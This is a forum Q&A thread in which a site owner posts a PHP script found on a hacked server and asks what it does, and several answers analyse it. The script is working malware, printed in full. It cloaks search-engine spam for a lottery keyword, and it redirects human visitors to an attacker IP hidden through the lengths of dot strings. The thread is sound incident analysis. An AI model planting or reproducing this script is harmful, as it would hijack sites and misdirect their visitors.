PHP malware on server - but helpless in identifying the malicious code

Question

I am new to this community, so please forgive me if my question is stupid.

I discovered that my server got hacked, and found several PHP files on it.

I haven't been lazy and tried my best to detect what the file actually was doing, but im really not understanding what the purpose of it is.

One PHP file is:

<?php



$user_agent_to_filter = array( '#Ask\s*Jeeves#i', '#HP\s*Web\s*PrintSmart#i', '#HTTrack#i', '#IDBot#i', '#Indy\s*Library#',

                               '#ListChecker#i', '#MSIECrawler#i', '#NetCache#i', '#Nutch#i', '#RPT-HTTPClient#i',

                               '#rulinki\.ru#i', '#Twiceler#i', '#WebAlta#i', '#Webster\s*Pro#i','#www\.cys\.ru#i',

                               '#Wysigot#i', '#Yahoo!\s*Slurp#i', '#Yeti#i', '#Accoona#i', '#CazoodleBot#i',

                               '#CFNetwork#i', '#ConveraCrawler#i','#DISCo#i', '#Download\s*Master#i', '#FAST\s*MetaWeb\s*Crawler#i',

                               '#Flexum\s*spider#i', '#Gigabot#i', '#HTMLParser#i', '#ia_archiver#i', '#ichiro#i',

                               '#IRLbot#i', '#Java#i', '#km\.ru\s*bot#i', '#kmSearchBot#i', '#libwww-perl#i',

                               '#Lupa\.ru#i', '#LWP::Simple#i', '#lwp-trivial#i', '#Missigua#i', '#MJ12bot#i',

                               '#msnbot#i', '#msnbot-media#i', '#Offline\s*Explorer#i', '#OmniExplorer_Bot#i',

                               '#PEAR#i', '#psbot#i', '#Python#i', '#rulinki\.ru#i', '#SMILE#i',

                               '#Speedy#i', '#Teleport\s*Pro#i', '#TurtleScanner#i', '#User-Agent#i', '#voyager#i',

                               '#Webalta#i', '#WebCopier#i', '#WebData#i', '#WebZIP#i', '#Wget#i',

                               '#Yandex#i', '#Yanga#i', '#Yeti#i','#msnbot#i',

                               '#spider#i', '#yahoo#i', '#jeeves#i' ,'#google#i' ,'#altavista#i',

                               '#scooter#i' ,'#av\s*fetch#i' ,'#asterias#i' ,'#spiderthread revision#i' ,'#sqworm#i',

                               '#ask#i' ,'#lycos.spider#i' ,'#infoseek sidewinder#i' ,'#ultraseek#i' ,'#polybot#i',

                               '#webcrawler#i', '#robozill#i', '#gulliver#i', '#architextspider#i', '#yahoo!\s*slurp#i',

                               '#charlotte#i', '#ngb#i', '#BingBot#i' ) ;



if ( !empty( $_SERVER['HTTP_USER_AGENT'] ) && ( FALSE !== strpos( preg_replace( $user_agent_to_filter, '-NO-WAY-', $_SERVER['HTTP_USER_AGENT'] ), '-NO-WAY-' ) ) ){

    $isbot = 1;

    }



if( FALSE !== strpos( gethostbyaddr($_SERVER['REMOTE_ADDR']), 'google')) 

{

    $isbot = 1;

}



$adr1 = ".....................................";

$adr2 = ".";

$adr3 = "...................................................................................................................................................................................................................";

$adr4 = "..............................................................................................................................................................................................................";

$ard = strlen($adr1).".".strlen($adr2).".".strlen($adr3).".".strlen($adr4);



if ($isbot)

{



    $myname  = basename($_SERVER['SCRIPT_NAME'], ".php");   

    if (file_exists($myname))

    {

    $html = file($myname);

    $html = implode($html, "");

    echo $html;

    exit;

    }



    //if (!strpos($_SERVER['HTTP_USER_AGENT'], "google")) exit;



    while($tpl == 0)

    {

$tpl_n = rand(1,9);

$tpl = @file("tpl$tpl_n.html");

    }



$keyword = "1 euro terno su tutte vincita
";

$keyword = chop($keyword);

$relink = "<UL></UL>";







 $query_pars = $keyword;

 $query_pars_2 = str_replace(" ", "+", chop($query_pars));



for ($page=1;$page<3;$page++)

{

 $ch = curl_init();  

curl_setopt($ch, CURLOPT_URL, "http://www.ask.com/web?q=$query_pars_2&qsrc=11&adt=1&o=0&l=dir&page=$page"); 

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 

curl_setopt($ch, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.6) Gecko/20060928 Firefox/1.5.0.6');

$result = curl_exec($ch); 

curl_close($ch);



$result = str_replace("\r\n", "", $result);

$result = str_replace("\n", "", $result);



        preg_match_all ("#web-result-description\">(.*)</p></div>#iU",$result,$m);

        foreach ($m[1] as $a) $text .= $a;



}       





         $mas1 = array("1", "2", "3", "4", "5");

    $mas2 = array("11-20", "21-30", "31-40", "41-50", "51-60");

    $setmktBing = "US";

    $lang = "US";





$ch = curl_init();  

curl_setopt($ch, CURLOPT_URL, "http://search.yahoo.com/search?p=$query_pars_2"); 

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 

curl_setopt($ch, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.6) Gecko/20060928 Firefox/1.5.0.6');

$result = curl_exec($ch); 

curl_close($ch);

        preg_match_all ("#<p class=\"lh-17\">(.*)</p></div>#iU",$result,$m);

        foreach ($m[1] as $a) $text .= $a;  



    //  echo $result;

    //  exit;



    sleep(1);



foreach ($mas1 as $var=>$key)

{       

        $link = "";

        preg_match_all ("#<strong>$key</strong><a href=\"(.*)\" title=\"Results $mas2[$var]\"#iU",$result,$mm);

        $link = str_replace('<strong>'.$key.'</strong><a href="', "", $mm[0][0]);

        $link = str_replace('" title="Results '.$mas2[$var].'"', "", $link);

        if (strlen($link)<5) continue;

$ch = curl_init();  

curl_setopt($ch, CURLOPT_URL, "$link"); 

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 

curl_setopt($ch, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.6) Gecko/20060928 Firefox/1.5.0.6');

$result = curl_exec($ch); 

curl_close($ch);

        preg_match_all ("#<p class=\"lh-17\">(.*)</p></div>#iU",$result,$m);

        foreach ($m[1] as $a) $text .= $a;  



    sleep(1);

        }



        $ch = curl_init();  

curl_setopt($ch, CURLOPT_URL, "https://www.google.com/search?q=$query_pars_2&num=100&newwindow=1&source=lnt&tbs=qdr:d&sa=X"); 

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 

//curl_setopt($ch, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.6) Gecko/20060928 Firefox/1.5.0.6');

$result = curl_exec($ch); 

curl_close($ch);



$result = str_replace("\r\n", "", $result);

$result = str_replace("\n", "", $result);



//echo $result;



        preg_match_all ("#<span class=\"st\">(.*)</span>#iU",$result,$m);

        foreach ($m[1] as $a) $text .= $a;



                $text = str_replace("...", "", $text);

        $text = strip_tags($text); 

        $text = str_replace("  ", " ", $text);

        $text = str_replace("  ", " ", $text);

        $text = str_replace("  ", " ", $text);

        $text = str_replace("  ", " ", $text);

        $text = str_replace("  ", " ", $text);

        $text = str_replace("  ", " ", $text);

        $text = str_replace("  ", " ", $text);



        $text = explode(".", $text);



        shuffle($text);

            $text = array_unique($text);

        $text = implode(". ", $text);



        $html = implode ("\n", $tpl);

        $html = str_replace("[BKEYWORD]", $keyword, $html);

        $html = str_replace("[LINKS]", $relink, $html);

        $html = str_replace("[SNIPPETS]", $text, $html);



        $out = fopen($myname, "w");

        fwrite($out, $html);

        fclose($out);



        echo $html;



}   



if(!@$isbot)

{





$s = dirname($_SERVER['PHP_SELF']);

if ($s == '\\' | $s == '/') {$s = ('');}  

$s = $_SERVER['SERVER_NAME'] . $s;



header("Location: http://$ard/input/?mark=20160624-$s");

//header("Location: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx");

exit;

}



?>

In my understanding, the code does the following:

1) Check if it gets executed by a bot - if so terminate

2) decrypt the hidden IP

3) create a search term in a very useless way?

4) Make three curl search requests to yahoo, google and ask.com

5) get the data from those search requests, only take certain information

6) write those information into a file?

In my best understanding thats what the program is doing, but I don't get what the harm is ? Why would someone go through the hassle to find a website to sneak this on to? or am i missing anything critical in this script?

Thanks for all your help!

Answer 1

(I haven't gone over the code, I'm speculating because your description fits the modus of some malware I've seen in the past.)

It's probably a bot that is trying to build a network of backlinks to a known group of web assets.

Basically they find a vulnerable site and pop it. From there the script does a search to find which of the attacker's assets are currently ranking highest (or lowest) and haven't been penalized by Google/et al. yet.

They promote their assets further by implanting top keywords and links to those sites into an HTML document that gets served from your domain. Now when Google indexes your site, they see you are endorsing their sites and they rank even higher in the search results.

It's pretty clever.

It's toxic to you though because when Google penalizes spam farms, they also penalize sites that link to them. Your SEO will probably will take a hit if/when judgment day comes. Remediate this ASAP.

Answer 2

Well, ill give you some more detail:

Note, this is not malware that is trying to break deeper on your system, is a script that makes someone (italian i guess) earn money using your server in 2 ways (at your cost):

• If is a bot (a search bot) who is doing the request, it will perform a few requests promoting the keyword: "1 euro terno su tutte vincita" and it will print a suffle of words taken from the results. So they are promotting some lotto sites from your server IP.

This are the base urls:

# https://www.google.com/search?q=1 euro terno su tutte vincita&num=100&newwindow=1&source=lnt&tbs=qdr:d&sa=X
# http://search.yahoo.com/search?p=1 euro terno su tutte vincita
# http://www.ask.com/web?q=1 euro terno su tutte vincita&qsrc=11&adt=1&o=0&l=dir&page=$page

• If is not a bot, if is a good user agent, the script will redirect the user browser to another compromised server, but this time to a porn ad network.

Thers a hidden IP in the script (in the dots):

• IP: 37.1.211.206
• COUNTRY: US (USA)

$adr1 = ".....................................";
$adr2 = ".";
$adr3 = "...................................................................................................................................................................................................................";
$adr4 = "..............................................................................................................................................................................................................";
// get it from the lenght of the strings, not the best way to hidde something ^^
$ard = strlen($adr1) . "." . strlen($adr2) . "." . strlen($adr3) . "." . strlen($adr4);
// echo $ard;

And the other part is just joining the strings and doing this request: http://37.1.211.206/input/?mark=20160624-(SERVER_NAME)

if (!@$isbot) {
    $s = dirname($_SERVER['PHP_SELF']);
    if ($s == '\\' | $s == '/') {
        $s = ('');
    }
    $s = $_SERVER['SERVER_NAME'] . $s;
    header("Location: http://$ard/input/?mark=20160624-$s");
    exit;
}

At the end the server at 37.1.211.206 will save your servers ID and redirect you to a random porn ad server.

Answer 3

Use the IP address to serve justice on this script kiddy.

A traceroute to his IP from here (local hops removed):

  3    17 ms    17 ms    17 ms  be4066.ccr22.yyz02.atlas.cogentco.com [38.122.69.117]
  4    23 ms    24 ms    23 ms  be2994.ccr22.cle04.atlas.cogentco.com [154.54.31.233]
  5    31 ms    30 ms    31 ms  be2718.ccr42.ord01.atlas.cogentco.com [154.54.7.129]
  6    32 ms    31 ms    31 ms  be2248.ccr22.ord03.atlas.cogentco.com [154.54.5.158]
  7    32 ms    32 ms    32 ms  be2617.rcr12.b002281-5.ord03.atlas.cogentco.com [154.54.40.94]
  8    31 ms    37 ms    31 ms  38.122.181.114
  9    31 ms    33 ms    31 ms  37.1.209.2
 10    32 ms    32 ms    31 ms  37.1.211.206

Reverse DNS lookup on the last 3 hosts reveal nothing further directly, except if you check the whole subnets:

38.122.181.113  te0-0-0-2.rcr12.b002281-5.ord03.atlas.cogentco.com

The subnet appears to be customer endpoints for the Cogent Communications ISP. If we quick port scan the attacker's server, we see only 22/ssh and 80/http open. That strongly suggests a linux box, or a router. The webpage on the server appears to be the fresh install page for apache. Going to the script in the code first redirects to the domain hstraffa.com, and then to a third party porn site. A quick rake of hstraffa.com social presence reveals only 2 google+ likes. Here is one (WARNING: minimal but present graphic content) https://plus.google.com/105307781761317547299 and another: https://plus.google.com/115324666314038607739 . They appear to be Indian names, and a human being appears to be behind it all. A not very skilled script kiddie trying to monetize porn ads.

I would just take all of this, with your own investigation results (php scripts and server logs related to the incident, and contact the security officer at Cogent Communications. Let them take care of it.

You do however need to clean your own side, and I would recommend a fresh server install if you cannot figure out how they got in. Next intrusion might not be so benign...